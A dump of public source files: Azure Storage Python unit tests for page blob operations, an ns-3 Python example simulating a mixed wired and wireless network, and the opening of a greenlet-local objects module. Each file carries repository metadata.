"id": "68cee0b7e4a4d2b564832112edf67defc22d0bb6",
"size": "1704",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "cartoframes/viz/legends/size_bins_legend.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "51696"
},
{
"name": "Jinja",
"bytes": "18917"
},
{
"name": "Makefile",
"bytes": "217"
},
{
"name": "Python",
"bytes": "773606"
}
],
"symlink_target": ""
} |
import os
import unittest
from azure.common import AzureHttpError
from azure.storage.blob import (
Blob,
PageBlobService,
SequenceNumberAction,
PageRange,
)
from tests.testcase import (
StorageTestCase,
TestMode,
record,
)
#------------------------------------------------------------------------------
TEST_BLOB_PREFIX = 'blob'
FILE_PATH = 'blob_input.temp.dat'
LARGE_BLOB_SIZE = 64 * 1024 + 512
#------------------------------------------------------------------------------s
class StoragePageBlobTest(StorageTestCase):
def setUp(self):
super(StoragePageBlobTest, self).setUp()
self.bs = self._create_storage_service(PageBlobService, self.settings)
self.container_name = self.get_resource_name('utcontainer')
if not self.is_playback():
self.bs.create_container(self.container_name)
# test chunking functionality by reducing the size of each chunk,
# otherwise the tests would take too long to execute
self.bs.MAX_PAGE_SIZE = 4 * 1024
def tearDown(self):
if not self.is_playback():
try:
self.bs.delete_container(self.container_name)
except:
pass
if os.path.isfile(FILE_PATH):
try:
os.remove(FILE_PATH)
except:
pass
return super(StoragePageBlobTest, self).tearDown()
#--Helpers-----------------------------------------------------------------
def _get_blob_reference(self):
return self.get_resource_name(TEST_BLOB_PREFIX)
def _create_blob(self, length=512):
blob_name = self._get_blob_reference()
self.bs.create_blob(self.container_name, blob_name, length)
return blob_name
def assertBlobEqual(self, container_name, blob_name, expected_data):
actual_data = self.bs.get_blob_to_bytes(container_name, blob_name)
self.assertEqual(actual_data.content, expected_data)
class NonSeekableFile(object):
def __init__(self, wrapped_file):
self.wrapped_file = wrapped_file
def write(self, data):
self.wrapped_file.write(data)
def read(self, count):
return self.wrapped_file.read(count)
#--Test cases for page blobs --------------------------------------------
@record
def test_create_blob(self):
# Arrange
blob_name = self._get_blob_reference()
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 1024)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.bs.exists(self.container_name, blob_name)
@record
def test_create_blob_with_metadata(self):
# Arrange
blob_name = self._get_blob_reference()
metadata = {'hello': 'world', 'number': '42'}
# Act
resp = self.bs.create_blob(self.container_name, blob_name, 512, metadata=metadata)
# Assert
md = self.bs.get_blob_metadata(self.container_name, blob_name)
self.assertDictEqual(md, metadata)
@record
def test_put_page_with_lease_id(self):
# Arrange
blob_name = self._create_blob()
lease_id = self.bs.acquire_blob_lease(self.container_name, blob_name)
# Act
data = self.get_random_bytes(512)
self.bs.update_page(self.container_name, blob_name, data, 0, 511, lease_id=lease_id)
# Assert
blob = self.bs.get_blob_to_bytes(self.container_name, blob_name, lease_id=lease_id)
self.assertEqual(blob.content, data)
@record
def test_update_page(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_with_md5(self):
# Arrange
blob_name = self._create_blob()
# Act
data = self.get_random_bytes(512)
resp = self.bs.update_page(self.container_name, blob_name, data, 0, 511,
validate_content=True)
# Assert
@record
def test_clear_page(self):
# Arrange
blob_name = self._create_blob()
# Act
resp = self.bs.clear_page(self.container_name, blob_name, 0, 511)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
self.assertBlobEqual(self.container_name, blob_name, b'\x00' * 512)
@record
def test_put_page_if_sequence_number_lt_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence + 1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lt_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lt=start_sequence)
# Assert
@record
def test_update_page_if_sequence_number_lte_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_lte_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_lte=start_sequence - 1)
# Assert
@record
def test_update_page_if_sequence_number_eq_success(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512, sequence_number=start_sequence)
# Act
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
@record
def test_update_page_if_sequence_number_eq_failure(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
start_sequence = 10
self.bs.create_blob(self.container_name, blob_name, 512,
sequence_number=start_sequence)
# Act
with self.assertRaises(AzureHttpError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511,
if_sequence_number_eq=start_sequence - 1)
# Assert
@record
def test_update_page_unicode(self):
# Arrange
blob_name = self._create_blob()
# Act
data = u'abcdefghijklmnop' * 32
with self.assertRaises(TypeError):
self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Assert
@record
def test_get_page_ranges_no_pages(self):
# Arrange
blob_name = self._create_blob()
# Act
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, list)
self.assertEqual(len(ranges), 0)
@record
def test_get_page_ranges_2_pages(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(512)
resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
resp2 = self.bs.update_page(self.container_name, blob_name, data, 1024, 1535)
# Act
ranges = self.bs.get_page_ranges(self.container_name, blob_name)
# Assert
self.assertIsNotNone(ranges)
self.assertIsInstance(ranges, list)
self.assertEqual(len(ranges), 2)
self.assertEqual(ranges[0].start, 0)
self.assertEqual(ranges[0].end, 511)
self.assertEqual(ranges[1].start, 1024)
self.assertEqual(ranges[1].end, 1535)
@record
def test_get_page_ranges_diff(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(1536)
snapshot1 = self.bs.snapshot_blob(self.container_name, blob_name)
self.bs.update_page(self.container_name, blob_name, data, 0, 1535)
snapshot2 = self.bs.snapshot_blob(self.container_name, blob_name)
self.bs.clear_page(self.container_name, blob_name, 512, 1023)
# Act
ranges1 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot1.snapshot)
ranges2 = self.bs.get_page_ranges_diff(self.container_name, blob_name, snapshot2.snapshot)
# Assert
self.assertIsNotNone(ranges1)
self.assertIsInstance(ranges1, list)
self.assertEqual(len(ranges1), 3)
self.assertEqual(ranges1[0].is_cleared, False)
self.assertEqual(ranges1[0].start, 0)
self.assertEqual(ranges1[0].end, 511)
self.assertEqual(ranges1[1].is_cleared, True)
self.assertEqual(ranges1[1].start, 512)
self.assertEqual(ranges1[1].end, 1023)
self.assertEqual(ranges1[2].is_cleared, False)
self.assertEqual(ranges1[2].start, 1024)
self.assertEqual(ranges1[2].end, 1535)
self.assertIsNotNone(ranges2)
self.assertIsInstance(ranges2, list)
self.assertEqual(len(ranges2), 1)
self.assertEqual(ranges2[0].is_cleared, True)
self.assertEqual(ranges2[0].start, 512)
self.assertEqual(ranges2[0].end, 1023)
@record
def test_update_page_fail(self):
# Arrange
blob_name = self._create_blob(2048)
data = self.get_random_bytes(512)
resp1 = self.bs.update_page(self.container_name, blob_name, data, 0, 511)
# Act
try:
self.bs.update_page(self.container_name, blob_name, data, 1024, 1536)
except ValueError as e:
self.assertEqual(str(e), 'end_range must align with 512 page size')
return
# Assert
raise Exception('Page range validation failed to throw on failure case')
@record
def test_resize_blob(self):
# Arrange
blob_name = self._create_blob(1024)
# Act
resp = self.bs.resize_blob(self.container_name, blob_name, 512)
# Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.content_length, 512)
@record
def test_set_sequence_number_blob(self):
# Arrange
blob_name = self._create_blob()
# Act
resp = self.bs.set_sequence_number(self.container_name, blob_name, SequenceNumberAction.Update, 6)
#Assert
self.assertIsNotNone(resp.etag)
self.assertIsNotNone(resp.last_modified)
self.assertIsNotNone(resp.sequence_number)
blob = self.bs.get_blob_properties(self.container_name, blob_name)
self.assertIsInstance(blob, Blob)
self.assertEqual(blob.properties.page_blob_sequence_number, 6)
def test_create_blob_from_bytes(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
def test_create_blob_from_bytes_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
self.bs.create_blob_from_bytes(self.container_name, blob_name, data, progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
def test_create_blob_from_bytes_with_index(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
index = 1024
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[1024:])
@record
def test_create_blob_from_bytes_with_index_and_count(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
index = 512
count = 1024
# Act
resp = self.bs.create_blob_from_bytes(self.container_name, blob_name, data, index, count)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[index:index + count])
def test_create_blob_from_path(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
FILE_PATH = 'blob_input.temp.dat'
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
def test_create_blob_from_path_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
self.bs.create_blob_from_path(self.container_name, blob_name, FILE_PATH,
progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data)
self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)
def test_create_blob_from_stream(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
def test_create_blob_from_stream_non_seekable(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
non_seekable_file = StoragePageBlobTest.NonSeekableFile(stream)
self.bs.create_blob_from_stream(self.container_name, blob_name,
non_seekable_file, blob_size,
max_connections=1)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
def test_create_blob_from_stream_with_progress(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
blob_size = len(data)
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream,
blob_size, progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self.assert_upload_progress(len(data), self.bs.MAX_PAGE_SIZE, progress)
def test_create_blob_from_stream_truncated(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
blob_size = len(data) - 512
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream, blob_size)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
def test_create_blob_from_stream_with_progress_truncated(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
with open(FILE_PATH, 'wb') as stream:
stream.write(data)
# Act
progress = []
def callback(current, total):
progress.append((current, total))
blob_size = len(data) - 512
with open(FILE_PATH, 'rb') as stream:
self.bs.create_blob_from_stream(self.container_name, blob_name, stream,
blob_size, progress_callback=callback)
# Assert
self.assertBlobEqual(self.container_name, blob_name, data[:blob_size])
self.assert_upload_progress(blob_size, self.bs.MAX_PAGE_SIZE, progress)
@record
def test_create_blob_with_md5_small(self):
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(512)
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data,
validate_content=True)
# Assert
def test_create_blob_with_md5_large(self):
# parallel tests introduce random order of requests, can only run live
if TestMode.need_recording_file(self.test_mode):
return
# Arrange
blob_name = self._get_blob_reference()
data = self.get_random_bytes(LARGE_BLOB_SIZE)
# Act
self.bs.create_blob_from_bytes(self.container_name, blob_name, data,
validate_content=True)
# Assert
#------------------------------------------------------------------------------
if __name__ == '__main__':
unittest.main()
| {
"content_hash": "95d1ffa2b9f3ab4e4783853b3d9812bc",
"timestamp": "",
"source": "github",
"line_count": 631,
"max_line_length": 111,
"avg_line_length": 34.210776545166404,
"alnum_prop": 0.5968870153333025,
"repo_name": "emgerner-msft/azure-storage-python",
"id": "bb74f63c26daaa6b863637473d9f8bba8dc87ae7",
"size": "22346",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/test_page_blob.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1242"
},
{
"name": "Python",
"bytes": "1256232"
}
],
"symlink_target": ""
} |
# /*
# * This program is free software; you can redistribute it and/or modify
# * it under the terms of the GNU General Public License version 2 as
# * published by the Free Software Foundation;
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
# *
# */
#
# This ns-3 example demonstrates the use of helper functions to ease
# the construction of simulation scenarios.
#
# The simulation topology consists of a mixed wired and wireless
# scenario in which a hierarchical mobility model is used.
#
# The simulation layout consists of N backbone routers interconnected
# by an ad hoc wifi network.
# Each backbone router also has a local 802.11 network and is connected
# to a local LAN. An additional set of(K-1) nodes are connected to
# this backbone. Finally, a local LAN is connected to each router
# on the backbone, with L-1 additional hosts.
#
# The nodes are populated with TCP/IP stacks, and OLSR unicast routing
# on the backbone. An example UDP transfer is shown. The simulator
# be configured to output tcpdumps or traces from different nodes.
#
#
# +--------------------------------------------------------+
# | |
# | 802.11 ad hoc, ns-2 mobility |
# | |
# +--------------------------------------------------------+
# | o o o(N backbone routers) |
# +--------+ +--------+
# wired LAN | mobile | wired LAN | mobile |
# -----------| router | -----------| router |
# --------- ---------
# | |
# +----------------+ +----------------+
# | 802.11 | | 802.11 |
# | net | | net |
# | K-1 hosts | | K-1 hosts |
# +----------------+ +----------------+
#
import ns.applications
import ns.core
import ns.csma
import ns.internet
import ns.mobility
import ns.network
import ns.olsr
import ns.wifi
# #
# # This function will be used below as a trace sink
# #
# static void
# CourseChangeCallback(std.string path, Ptr<const MobilityModel> model)
# {
# Vector position = model.GetPosition();
# std.cout << "CourseChange " << path << " x=" << position.x << ", y=" << position.y << ", z=" << position.z << std.endl;
# }
def main(argv):
#
# First, we declare and initialize a few local variables that control some
# simulation parameters.
#
backboneNodes = 10
infraNodes = 5
lanNodes = 5
stopTime = 10
#
# Simulation defaults are typically set next, before command line
# arguments are parsed.
#
ns.core.Config.SetDefault("ns3::OnOffApplication::PacketSize", ns.core.StringValue("210"))
ns.core.Config.SetDefault("ns3::OnOffApplication::DataRate", ns.core.StringValue("448kb/s"))
#
# For convenience, we add the local variables to the command line argument
# system so that they can be overridden with flags such as
# "--backboneNodes=20"
#
cmd = ns.core.CommandLine()
#cmd.AddValue("backboneNodes", "number of backbone nodes", backboneNodes)
#cmd.AddValue("infraNodes", "number of leaf nodes", infraNodes)
#cmd.AddValue("lanNodes", "number of LAN nodes", lanNodes)
#cmd.AddValue("stopTime", "simulation stop time(seconds)", stopTime)
#
# The system global variables and the local values added to the argument
# system can be overridden by command line arguments by using this call.
#
cmd.Parse(argv)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# #
# Construct the backbone #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
#
# Create a container to manage the nodes of the adhoc(backbone) network.
# Later we'll create the rest of the nodes we'll need.
#
backbone = ns.network.NodeContainer()
backbone.Create(backboneNodes)
#
# Create the backbone wifi net devices and install them into the nodes in
# our container
#
wifi = ns.wifi.WifiHelper()
mac = ns.wifi.NqosWifiMacHelper.Default()
mac.SetType("ns3::AdhocWifiMac")
wifi.SetRemoteStationManager("ns3::ConstantRateWifiManager",
"DataMode", ns.core.StringValue("OfdmRate54Mbps"))
wifiPhy = ns.wifi.YansWifiPhyHelper.Default()
wifiChannel = ns.wifi.YansWifiChannelHelper.Default()
wifiPhy.SetChannel(wifiChannel.Create())
backboneDevices = wifi.Install(wifiPhy, mac, backbone)
#
# Add the IPv4 protocol stack to the nodes in our container
#
print "Enabling OLSR routing on all backbone nodes"
internet = ns.internet.InternetStackHelper()
olsr = ns.olsr.OlsrHelper()
internet.SetRoutingHelper(olsr); # has effect on the next Install ()
internet.Install(backbone);
# re-initialize for non-olsr routing.
internet.Reset()
#
# Assign IPv4 addresses to the device drivers(actually to the associated
# IPv4 interfaces) we just created.
#
ipAddrs = ns.internet.Ipv4AddressHelper()
ipAddrs.SetBase(ns.network.Ipv4Address("192.168.0.0"), ns.network.Ipv4Mask("255.255.255.0"))
ipAddrs.Assign(backboneDevices)
#
# The ad-hoc network nodes need a mobility model so we aggregate one to
# each of the nodes we just finished building.
#
mobility = ns.mobility.MobilityHelper()
positionAlloc = ns.mobility.ListPositionAllocator()
x = 0.0
for i in range(backboneNodes):
positionAlloc.Add(ns.core.Vector(x, 0.0, 0.0))
x += 5.0
mobility.SetPositionAllocator(positionAlloc)
mobility.SetMobilityModel("ns3::RandomDirection2dMobilityModel",
"Bounds", ns.mobility.RectangleValue(ns.mobility.Rectangle(0, 1000, 0, 1000)),
"Speed", ns.core.StringValue ("ns3::ConstantRandomVariable[Constant=2000]"),
"Pause", ns.core.StringValue ("ns3::ConstantRandomVariable[Constant=0.2]"))
mobility.Install(backbone)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# #
# Construct the LANs #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# Reset the address base-- all of the CSMA networks will be in
# the "172.16 address space
ipAddrs.SetBase(ns.network.Ipv4Address("172.16.0.0"), ns.network.Ipv4Mask("255.255.255.0"))
for i in range(backboneNodes):
print "Configuring local area network for backbone node ", i
#
# Create a container to manage the nodes of the LAN. We need
# two containers here; one with all of the new nodes, and one
# with all of the nodes including new and existing nodes
#
newLanNodes = ns.network.NodeContainer()
newLanNodes.Create(lanNodes - 1)
# Now, create the container with all nodes on this link
lan = ns.network.NodeContainer(ns.network.NodeContainer(backbone.Get(i)), newLanNodes)
#
# Create the CSMA net devices and install them into the nodes in our
# collection.
#
csma = ns.csma.CsmaHelper()
csma.SetChannelAttribute("DataRate", ns.network.DataRateValue(ns.network.DataRate(5000000)))
csma.SetChannelAttribute("Delay", ns.core.TimeValue(ns.core.MilliSeconds(2)))
lanDevices = csma.Install(lan)
#
# Add the IPv4 protocol stack to the new LAN nodes
#
internet.Install(newLanNodes)
#
# Assign IPv4 addresses to the device drivers(actually to the
# associated IPv4 interfaces) we just created.
#
ipAddrs.Assign(lanDevices)
#
# Assign a new network prefix for the next LAN, according to the
# network mask initialized above
#
ipAddrs.NewNetwork()
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# #
# Construct the mobile networks #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# Reset the address base-- all of the 802.11 networks will be in
# the "10.0" address space
ipAddrs.SetBase(ns.network.Ipv4Address("10.0.0.0"), ns.network.Ipv4Mask("255.255.255.0"))
for i in range(backboneNodes):
print "Configuring wireless network for backbone node ", i
#
# Create a container to manage the nodes of the LAN. We need
# two containers here; one with all of the new nodes, and one
# with all of the nodes including new and existing nodes
#
stas = ns.network.NodeContainer()
stas.Create(infraNodes - 1)
# Now, create the container with all nodes on this link
infra = ns.network.NodeContainer(ns.network.NodeContainer(backbone.Get(i)), stas)
#
# Create another ad hoc network and devices
#
ssid = ns.wifi.Ssid('wifi-infra' + str(i))
wifiInfra = ns.wifi.WifiHelper.Default()
wifiPhy.SetChannel(wifiChannel.Create())
wifiInfra.SetRemoteStationManager('ns3::ArfWifiManager')
macInfra = ns.wifi.NqosWifiMacHelper.Default();
macInfra.SetType("ns3::StaWifiMac",
"Ssid", ns.wifi.SsidValue(ssid),
"ActiveProbing", ns.core.BooleanValue(False))
# setup stas
staDevices = wifiInfra.Install(wifiPhy, macInfra, stas)
# setup ap.
macInfra.SetType("ns3::ApWifiMac",
"Ssid", ns.wifi.SsidValue(ssid),
"BeaconGeneration", ns.core.BooleanValue(True),
"BeaconInterval", ns.core.TimeValue(ns.core.Seconds(2.5)))
apDevices = wifiInfra.Install(wifiPhy, macInfra, backbone.Get(i))
# Collect all of these new devices
infraDevices = ns.network.NetDeviceContainer(apDevices, staDevices)
# Add the IPv4 protocol stack to the nodes in our container
#
internet.Install(stas)
#
# Assign IPv4 addresses to the device drivers(actually to the associated
# IPv4 interfaces) we just created.
#
ipAddrs.Assign(infraDevices)
#
# Assign a new network prefix for each mobile network, according to
# the network mask initialized above
#
ipAddrs.NewNetwork()
#
# The new wireless nodes need a mobility model so we aggregate one
# to each of the nodes we just finished building.
#
subnetAlloc = ns.mobility.ListPositionAllocator()
for j in range(infra.GetN()):
subnetAlloc.Add(ns.core.Vector(0.0, j, 0.0))
mobility.PushReferenceMobilityModel(backbone.Get(i))
mobility.SetPositionAllocator(subnetAlloc)
mobility.SetMobilityModel("ns3::RandomDirection2dMobilityModel",
"Bounds", ns.mobility.RectangleValue(ns.mobility.Rectangle(-25, 25, -25, 25)),
"Speed", ns.core.StringValue ("ns3::ConstantRandomVariable[Constant=30]"),
"Pause", ns.core.StringValue ("ns3::ConstantRandomVariable[Constant=0.4]"))
mobility.Install(infra)
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# #
# Application configuration #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# Create the OnOff application to send UDP datagrams of size
# 210 bytes at a rate of 448 Kb/s, between two nodes
print "Create Applications."
port = 9 # Discard port(RFC 863)
# Let's make sure that the user does not define too few LAN nodes
# to make this example work. We need lanNodes >= 5
assert(lanNodes >= 5)
appSource = ns.network.NodeList.GetNode(11)
appSink = ns.network.NodeList.GetNode(13)
remoteAddr = ns.network.Ipv4Address("172.16.0.5")
onoff = ns.applications.OnOffHelper("ns3::UdpSocketFactory",
ns.network.Address(ns.network.InetSocketAddress(remoteAddr, port)))
onoff.SetConstantRate (ns.network.DataRate ("10kb/s"))
apps = onoff.Install(ns.network.NodeContainer(appSource))
apps.Start(ns.core.Seconds(3.0))
apps.Stop(ns.core.Seconds(20.0))
# Create a packet sink to receive these packets
sink = ns.applications.PacketSinkHelper("ns3::UdpSocketFactory",
ns.network.InetSocketAddress(ns.network.Ipv4Address.GetAny(), port))
apps = sink.Install(ns.network.NodeContainer(appSink))
apps.Start(ns.core.Seconds(3.0))
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
# #
# Tracing configuration #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # /
print "Configure Tracing."
#
# Let's set up some ns-2-like ascii traces, using another helper class
#
#std.ofstream ascii
#ascii = ns.core.AsciiTraceHelper();
#stream = ascii.CreateFileStream("mixed-wireless.tr");
#wifiPhy.EnableAsciiAll(stream);
#csma.EnableAsciiAll(stream);
print "(tracing not done for Python)"
# Look at nodes 11, 13 only
# WifiHelper.EnableAscii(ascii, 11, 0);
# WifiHelper.EnableAscii(ascii, 13, 0);
# Let's do a pcap trace on the backbone devices
wifiPhy.EnablePcap("mixed-wireless", backboneDevices)
# Let's additionally trace the application Sink, ifIndex 0
csma = ns.csma.CsmaHelper()
csma.EnablePcapAll("mixed-wireless", False)
# #ifdef ENABLE_FOR_TRACING_EXAMPLE
# Config.Connect("/NodeList/*/$MobilityModel/CourseChange",
# MakeCallback(&CourseChangeCallback))
# #endif
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# #
# Run simulation #
# #
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
print "Run Simulation."
ns.core.Simulator.Stop(ns.core.Seconds(stopTime))
ns.core.Simulator.Run()
ns.core.Simulator.Destroy()
if __name__ == '__main__':
import sys
main(sys.argv)
| {
"content_hash": "9d16cbf9bf24196291fa829d6f2866bb",
"timestamp": "",
"source": "github",
"line_count": 363,
"max_line_length": 123,
"avg_line_length": 44.63636363636363,
"alnum_prop": 0.5264457199284083,
"repo_name": "Chiru/NVE_Simulation",
"id": "e0772db2b658750f8cb744ee08c1bb2130300ad3",
"size": "16203",
"binary": false,
"copies": "48",
"ref": "refs/heads/master",
"path": "NS3/examples/wireless/mixed-wireless.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "587430"
},
{
"name": "C++",
"bytes": "15139819"
},
{
"name": "DOT",
"bytes": "2792"
},
{
"name": "M",
"bytes": "5446"
},
{
"name": "Matlab",
"bytes": "18438"
},
{
"name": "Objective-C",
"bytes": "15035"
},
{
"name": "Perl",
"bytes": "302841"
},
{
"name": "Prolog",
"bytes": "2793"
},
{
"name": "Python",
"bytes": "32484684"
},
{
"name": "Scala",
"bytes": "51"
},
{
"name": "Shell",
"bytes": "7282"
}
],
"symlink_target": ""
} |
"""greenlet-local objects
"""
from weakref import WeakKeyDictionary
from copy import copy
from .lock import RLock
from greenlet import getcurrent
__all__ = ["local"]
class _localbase:
__slots__ = '_local__args', '_local__lock', '_local__dicts'
def __new__(cls, *args, **kw):
self = object.__new__(cls)
object.__setattr__(self, '_local__args', (args, kw))
object.__setattr__(self, '_local__lock', RLock())
dicts = WeakKeyDictionary()
object.__setattr__(self, '_local__dicts', dicts)
# We need to create the greenlet dict in anticipation of
# __init__ being called, to make sure we don't call it again ourselves.
dict = object.__getattribute__(self, '__dict__')
dicts[getcurrent()] = dict
return self
def _init_locals(self):
d = {}
dicts = object.__getattribute__(self, '_local__dicts')
dicts[getcurrent()] = d
object.__setattr__(self, '__dict__', d)
# we have a new instance dict, so call out __init__ if we have one
cls = type(self)
if cls.__init__ is not object.__init__:
args, kw = object.__getattribute__(self, '_local__args')
cls.__init__(self, *args, **kw)
class local(_localbase):
def __getattribute__(self, name):
